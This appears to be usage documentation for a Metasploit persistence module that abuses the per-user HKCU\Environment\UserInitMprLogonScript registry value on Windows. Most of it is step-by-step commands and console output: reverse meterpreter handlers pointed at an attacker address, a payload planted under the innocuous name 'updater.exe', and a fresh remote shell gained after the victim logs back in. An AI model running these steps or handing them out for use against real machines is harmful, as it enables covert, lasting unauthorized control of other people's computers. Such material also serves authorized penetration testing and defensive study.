Nayeraneru
8.4 KiB
8.4 KiB
Vulnerable Application
Windows Persistence via HKCU UserInitMprLogonScript
This module establishes persistence by leveraging the per-user registry value:
HKCU\Environment\UserInitMprLogonScript
The module writes a payload executable to disk and sets the
UserInitMprLogonScript value so that the payload executes when the user
logs in.
Unlike the traditional Winlogon\Userinit (HKLM) technique, this method:
- Does not require administrative privileges
- Does not modify system-wide registry keys
- Only affects the current user
- Executes during interactive user logon
The payload will execute when the user signs out and logs back in.
Verification Steps
- Start
msfconsole - Obtain a meterpreter session on a Windows target (user-level is sufficient)
use exploit/windows/persistence/userinit_mpr_logon_scriptset SESSION <id>set LHOST <attacker_ip>set LPORT <attacker_port>run- Sign out from the Windows session
- Log back in
- A new meterpreter session should be created
Options
SESSION (Required)
The session to run this module on.
LHOST (Required)
The local host to receive the reverse connection.
LPORT (Required)
The local port to receive the reverse connection.
PAYLOAD_NAME
The filename to use when writing the payload to disk.
If not specified, a random filename will be generated.
Scenarios
Initial Session
msf > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_https
payload => windows/x64/meterpreter/reverse_https
msf exploit(multi/handler) > set LHOST 172.21.176.212
LHOST => 172.21.176.212
msf exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf exploit(multi/handler) > run
[*] Started HTTPS reverse handler on https://172.21.176.212:4444
[!] https://172.21.176.212:4444 handling request from 172.21.176.1; (UUID: 7shkdu86) Without a database connected that payload UUID tracking will not work!
[*] https://172.21.176.212:4444 handling request from 172.21.176.1; (UUID: 7shkdu86) Staging x64 payload (233052 bytes) ...
[!] https://172.21.176.212:4444 handling request from 172.21.176.1; (UUID: 7shkdu86) Without a database connected that payload UUID tracking will not work!
[*] Meterpreter session 1 opened (172.21.176.212:4444 -> 172.21.176.1:62359) at 2026-03-01 05:45:19 +0200
meterpreter > background
[*] Backgrounding session 1...
msf exploit(multi/handler) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x64/win NERO\DELL @ NERO 172.21.176.212:4444 ->
dows 172.21.176.1:62359 (172
.21.176.1)
Install Persistence
msf exploit(multi/handler) > use exploit/windows/persistence/userinit_mpr_logon_script
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf exploit(windows/persistence/userinit_mpr_logon_script) > set SESSION 1
SESSION => 1
msf exploit(windows/persistence/userinit_mpr_logon_script) > set LHOST 172.21.176.212
LHOST => 172.21.176.212
msf exploit(windows/persistence/userinit_mpr_logon_script) > set LPORT 4444
LPORT => 4444
msf exploit(windows/persistence/userinit_mpr_logon_script) > set PAYLOAD_NAME updater
PAYLOAD_NAME => updater
msf exploit(windows/persistence/userinit_mpr_logon_script) > set WRITABLEDIR C:\\Users\\DELL\\AppData\\Roaming
WRITABLEDIR => C:\Users\DELL\AppData\Roaming
msf exploit(windows/persistence/userinit_mpr_logon_script) > set CleanUpRc true
CleanUpRc => true
msf exploit(windows/persistence/userinit_mpr_logon_script) > set VERBOSE true
VERBOSE => true
msf exploit(windows/persistence/userinit_mpr_logon_script) > check
[+] The target is vulnerable. Registry path is writable
msf exploit(windows/persistence/userinit_mpr_logon_script) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf exploit(windows/persistence/userinit_mpr_logon_script) >
[-] Handler failed to bind to 172.21.176.212:4444:- -
[-] Handler failed to bind to 0.0.0.0:4444:- -
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Registry path is writable
[+] Writing payload to C:\Users\DELL\AppData\Roaming\updater.exe
[+] Configured HKCU\Environment\UserInitMprLogonScript to execute C:\Users\DELL\AppData\Roaming\updater.exe
[*] Meterpreter-compatible Cleanup RC file: /home/nayera/.msf4/logs/persistence/NERO_20260301.4724/NERO_20260301.4724.rc
jobs
Jobs
====
Id Name Payload Payload opts
-- ---- ------- ------------
0 Exploit: windows/pers windows/meterpreter/r tcp://172.21.176.212:4
istence/userinit_mpr_ everse_tcp 444 (setting up)
logon_script
msf exploit(windows/persistence/userinit_mpr_logon_script) > jobs
Jobs
====
Id Name Payload Payload opts
-- ---- ------- ------------
0 Exploit: windows/pers windows/meterpreter/r tcp://172.21.176.212:4
istence/userinit_mpr_ everse_tcp 444 (setting up)
logon_script
msf exploit(windows/persistence/userinit_mpr_logon_script) > jobs -K
Stopping all jobs...
msf exploit(windows/persistence/userinit_mpr_logon_script) > jobs
Jobs
====
No active jobs.
msf exploit(windows/persistence/userinit_mpr_logon_script) > use exploit/multi/handler
[*] Using configured payload windows/x64/meterpreter/reverse_https
msf exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_https
payload => windows/x64/meterpreter/reverse_https
msf exploit(multi/handler) > set LHOST 172.21.176.212
LHOST => 172.21.176.212
msf exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf exploit(multi/handler) > run -j
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
msf exploit(multi/handler) >
[*] Started HTTPS reverse handler on https://172.21.176.212:4444
msf exploit(multi/handler) > jobs
Jobs
====
Id Name Payload Payload opts
-- ---- ------- ------------
1 Exploit: multi/handle windows/x64/meterpret https://172.21.176.212
r er/reverse_https :4444
msf exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: NERO\DELL
meterpreter > sysinfo
Computer : NERO
OS : Windows 11 24H2+ (10.0 Build 26200).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter > reg queryval -k HKCU\\Environment -v UserInitMprLogonScript
Key: HKCU\Environment
Name: UserInitMprLogonScript
Type: REG_SZ
Data: C:\Users\DELL\AppData\Roaming\updater.exe
meterpreter > reg setval -k HKCU\\Environment -v testvalue -d test
Successfully set testvalue of REG_SZ.
meterpreter > reg deleteval -k HKCU\\Environment -v testvalue
Successfully deleted testvalue.
meterpreter > ls C:\\Users\\DELL\\AppData\\Roaming\\updater.exe
100777/rwxrwxrwx 7168 fil 2026-03-01 05:47:24 +0200 C:\Users\DELL\AppData\Roaming\updater.exe
meterpreter > background
[*] Backgrounding session 1...
msf exploit(multi/handler) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x64/win NERO\DELL @ NERO 172.21.176.212:4444 ->
dows 172.21.176.1:62359 (172
.21.176.1)
msf exploit(multi/handler) > sessions -K
[*] Killing all sessions...
[*] 172.21.176.1 - Meterpreter session 1 closed.
msf exploit(multi/handler) > sessions
Active sessions
===============
No active sessions.
msf exploit(multi/handler) >
Logout, and log back in
msf exploit(multi/handler) >
[!] https://172.21.176.212:4444 handling request from 172.21.176.1; (UUID: bodrq2fe) Without a database connected that payload UUID tracking will not work!
[*] https://172.21.176.212:4444 handling request from 172.21.176.1; (UUID: bodrq2fe) Attaching orphaned/stageless session...
[!] https://172.21.176.212:4444 handling request from 172.21.176.1; (UUID: bodrq2fe) Without a database connected that payload UUID tracking will not work!
[*] Meterpreter session 2 opened (172.21.176.212:4444 -> 172.21.176.1:65263) at 2026-02-28 07:58:07 +0200